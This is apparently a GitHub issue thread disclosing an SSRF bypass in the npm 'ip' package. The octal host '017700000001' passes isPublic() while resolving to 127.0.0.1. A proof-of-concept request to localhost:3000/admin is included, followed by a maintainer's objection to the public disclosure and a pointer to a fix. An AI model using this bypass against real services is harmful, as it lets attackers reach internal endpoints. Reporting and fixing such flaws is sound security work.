Additional SSRF Bypass: Octal Format ("017700000001")

[emredurmaz4]

Summary
An additional critical SSRF bypass vulnerability affecting the ip.isPublic() function that was not covered in the existing Issue #150 or Issue #160.
Vulnerability Details
The input "017700000001" (32-bit octal format) is incorrectly classified as a public IP address, allowing SSRF bypass attacks:
const ip = require('ip');

console.log(ip.isPublic("017700000001")); // true ❌ (should be false)
console.log(ip.isPrivate("017700000001")); // false ❌ (should be true)

// Correct behavior:
console.log(ip.isPublic("127.0.0.1")); // false ✅

Impact
Severity: Critical SSRF bypass
Attack vector: http://017700000001:port/path URLs bypass IP validation
Network behavior: "017700000001" (octal) = 2130706433 (decimal) = 127.0.0.1 (localhost)
Format explanation: 32-bit octal representation where entire IPv4 address is encoded as single octal number.

Proof of Concept
// Typical vulnerable application
function makeRequest(userUrl) {
const hostname = new URL(userUrl).hostname;

if (ip.isPublic(hostname)) {
    return fetch(userUrl); // BYPASSED!
}
throw new Error("Private IP blocked");

}

// Attack succeeds:
makeRequest("http://017700000001:3000/admin"); // Accesses localhost:3000

Technical Analysis
The vulnerability stems from insufficient validation of alternative IP address representations:
// Octal to decimal conversion:
parseInt("017700000001", 8); // 2130706433
// Decimal to IP conversion:
// 2130706433 = (127 << 24) + (0 << 16) + (0 << 8) + 1 = 127.0.0.1

Relationship to Existing Issues
This octal format bypass complements the other techniques reported in:
Issue #150 (127.1, 127.0.1, fe80::0001, etc.)
Issue #160 (null route "0")
But was not included in those lists, representing an additional attack vector.

Affected Version
Package: ip@2.0.1 (current latest)
Downloads: 5+ million weekly
Impact scope: All applications using ip.isPublic() for SSRF protection
CVE Assignment
CVE-2025-59436 has been assigned for this vulnerability
CVE Database: https://nvd.nist.gov/vuln/detail/CVE-2025-59436
Severity: Critical (despite initial LOW scoring by MITRE - under review)

Request: Please consider addressing this octal format bypass alongside the other reported bypass techniques for comprehensive security coverage.

[ljharb]

Without evaluating this at all, if it's a new vulnerability, you've just irresponsibly disclosed it. Potential vulnerabilities MUST be only disclosed privately.

[emredurmaz4]

Hello there.
Thank you for the concern about responsible disclosure. I completely understand.
I expected that when fixes are implemented for the existing issues (#150, #160 - covering 127.1 and "0" bypasses), the octal format bypass would also be resolved.
I wanted to ensure this variant gets included when comprehensive fixes are developed, so nothing gets overlooked in the remediation process.
My goal is purely to help maintainers identify any gaps in current security patches, not create new vulnerabilities.
I apologize if this seemed premature - just trying to help with comprehensive security coverage for this important package. 🙏 Thanks for maintaining this project!

[ddemydenko]

I guess my fix will solve isPublic/isPrivate handling for ips like this "017700000001" (32-bit octal format)
#164